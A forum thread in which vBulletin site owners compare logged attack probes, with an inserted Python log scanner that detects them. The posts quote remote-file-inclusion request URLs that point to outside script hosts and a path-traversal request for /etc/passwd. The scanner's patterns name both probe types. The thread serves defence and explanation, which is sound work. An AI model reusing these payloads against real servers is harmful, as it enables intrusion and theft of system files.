  • Strange Spider!

    I caught a spider naming itself "wget spider", and it was crawling this page in my forum: /forum/showthread.php?t=http://ninaru.hut2.ru/images/cs.txt?

    Its user-agent is: Wget/1.1 (compatible; i486; Linux; RedHat7.3)

    Its IP is: 75.136.128.168

    IP resolving gives: 75-136-128-168.dhcp.gnvl.sc.charter.com

    Did you experience anything like this?
    Syrian Medical Society - mi la do - My Hacks - vCharset converter - Projects Queue

    I want to breathe the freedom, and to strew the mounts of nostalgia in your eyes.

  • #2
    It's trying to exploit vBulletin. Don't worry, it can't do it that way (I asked Zachery about it).

  • #3
    We've been getting several of those every day! The IP always changes, but all the URLs are similar. Here's a site that logs attacks; you can see more like it there:

    http://security.pigstye.net/staticpages/index.php/index

    They can't get in, but I put the following words in our Censored Words list just to be on the safe side.

    {ninaru} {hut2} {ru} {amyru} {h18} {kaos} {r57} {amygirl}

  • #4
    wget is (if you didn't already know) a Linux download program,
    such as: wget http://path.to/site/file.name
    So I think they were trying to download your showthread.php somehow but failed?

  • #5
    I get tons of them. They haven't done anything so far, but I still wish they'd go away; their long URLs stretch the "Who is online?" page.

    Location:
    /index.php//vb/faq?cmd=http://someurl.de/img/safe.txt? or /index.php//vb/faq?remote=http://someurl.de/img/safe.txt?
    Agent: libwww-perl/5.805

    Is it trying to exploit the forum through the FAQ?
    *Insert text here* :)

  • #6
    Originally posted by zappsan:
      I get tons of them. They haven't done anything so far, but I still wish they'd go away; their long URLs stretch the "Who is online?" page.

      Location:
      /index.php//vb/faq?cmd=http://someurl.de/img/safe.txt? or /index.php//vb/faq?remote=http://someurl.de/img/safe.txt?
      Agent: libwww-perl/5.805

      Is it trying to exploit the forum through the FAQ?
    Looks like it.

  • #7
    Any updates on this...?

  • #8
    I got a

    showthread.php?t=../../../../../../../etc/passwd

    one of these days :P
    Radio and TV Player for vBulletin

  • #9
    In my logs I see this:

    [27/Jan/2008:01:15:22 +0600]"GET /showthread.php?p=http://amyru.h18.ru/images/cs.txt?

    Please advise what to do...

  • #10
    ^I get that one a lot; it doesn't really seem to do anything...
    *Insert text here* :)

  • #11
    These are called site rippers. They could be harmful in many ways. While vBulletin is immune to this kind of attack, another use of these rippers is performing DoS attacks by consuming bandwidth via a huge number of requests to the server. They could all be blocked by adding them to your domain's .htaccess file. Check this guide for details.
    You're spending millions of dollars on a website?!

  • #12
    Thanks simsim,

    According to theplanet's security department, this

    "is an example of a malicious file being inserted into your content - cs.txt"

    He was referring to:

    grep =http /usr/local/apache/domlogs/* | grep txt

    [27/Jan/2008:01:15:22 +0600]"GET /showthread.php?p=http://amyru.h18.ru/images/cs.txt?

    I am really concerned about this, as I have heard differing views. Does this mean my server is compromised, or that vBulletin is compromised? Is there a fix for this?

    Please advise...

    Thanks

  • #13
    Tonight I saw them in the forums; before, they would be on the homepage of my site. I got about 15 web addresses this time around.
    Arcade.gs Game Site!

  • #14
    As simsim says, these are (very old) kiddie scripts that attempt to exploit a loophole that was inherent in very early versions of BB/forum and/or chat software applications. Basically, the way old parsers used to work was that anything after the URL (php, asp, etc.) was effectively a parameter list, and browsers/applications used to follow these as an execute command. So for instance, if the tagged parameter to a GET was an off-site command list, then the server would attempt to execute it, thus running malicious commands.

    As has been said, though, the more recent applications take the GET parameter lines as literals (which is why, when developing, it is SOOOO important to ensure that your code correctly and safely parses the GET parameters!!), so consequently the error message is displayed and it goes no further.

    It is certainly a bandwidth annoyance, but the more crucial issue about these scripts is that they are run by zombie computers that have already been infected by visiting sites that download malware (generally pr0n or warez sites), and are done in the background without the user's knowledge. These are then used by botmasters to effect DDoS attacks. I've compared many of these script IPs with those logged during very strong DDoS attacks in the past, and the lists are frighteningly exact in their comparisons.

    Of course I place IP bans on them; my .htaccess file is currently hitting around 35K, and I expect it to go much higher. I've set my 403.shtml file to explain why it's likely an IP number has been banned, and outlined the steps to take to clean their computer. They can then send an email (appropriately formatted) to me with the results of their anti-virus report and I would then, if I'm convinced, remove the block on the IP.
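The probes quoted in #9, #12 and #14 share one shape: a query parameter whose value is an off-site URL (or, as in #8, a run of `../`). The following is an added example, not code from this thread or from vBulletin: it parses Apache combined-format log lines (constructed samples modelled on the ones posted here, with documentation-range addresses and `example.invalid` in place of the real hosts), flags such parameters, and emits the `Deny from` lines that the .htaccess bans described in #11 and #14 would use.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed Apache combined-log lines modelled on the probes quoted in this
# thread. Addresses and hostnames are documentation placeholders, not real IoCs.
SAMPLE_LOG = """\
203.0.113.7 - - [27/Jan/2008:01:15:22 +0600] "GET /showthread.php?p=http://example.invalid/images/cs.txt? HTTP/1.1" 200 512 "-" "Wget/1.1 (compatible; i486; Linux; RedHat7.3)"
203.0.113.8 - - [27/Jan/2008:01:16:02 +0600] "GET /index.php//vb/faq?cmd=http://example.invalid/img/safe.txt? HTTP/1.1" 200 512 "-" "libwww-perl/5.805"
203.0.113.9 - - [27/Jan/2008:01:17:45 +0600] "GET /showthread.php?t=../../../../../../../etc/passwd HTTP/1.1" 404 210 "-" "Mozilla/5.0"
198.51.100.4 - - [27/Jan/2008:01:18:10 +0600] "GET /showthread.php?t=12345 HTTP/1.1" 200 8123 "-" "Mozilla/5.0"
"""

# Apache "combined" format: ip ident user [time] "request" status bytes "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+)[^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)
# A query value that is itself an absolute URL is the remote-file-inclusion probe
# seen in this thread; a run of "../" segments is the traversal probe from #8.
REMOTE_URL = re.compile(r'^(https?|ftp)://', re.IGNORECASE)
TRAVERSAL = re.compile(r'(^|/)\.\.(/|$)')

def classify(target):
    """Return [(param, reason)] for every suspicious query parameter in a request target."""
    findings = []
    # parse_qsl percent-decodes values, so %2e%2e/ is caught as well as a literal ../
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        if REMOTE_URL.match(value):
            findings.append((name, "remote-file-inclusion probe"))
        elif TRAVERSAL.search(value):
            findings.append((name, "path-traversal probe"))
    return findings

def scan(log_text):
    """Parse each log line and return one dict per suspicious parameter found."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # unparseable line: skip it rather than abort the whole scan
        for param, reason in classify(m["target"]):
            hits.append({"ip": m["ip"], "ts": m["ts"], "ua": m["ua"], "param": param,
                         "reason": reason, "status": int(m["status"])})
    return hits

def deny_rules(hits):
    """Apache 2.2-style .htaccess 'Deny from' lines, one per offending address."""
    return ["Deny from %s" % ip for ip in sorted({h["ip"] for h in hits})]
```

The user agent is kept per hit for review but is not used as a signal, since the client chooses it freely; the shape of the parameter value is the reliable part.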

  • #15
    If it's that bad then ban it
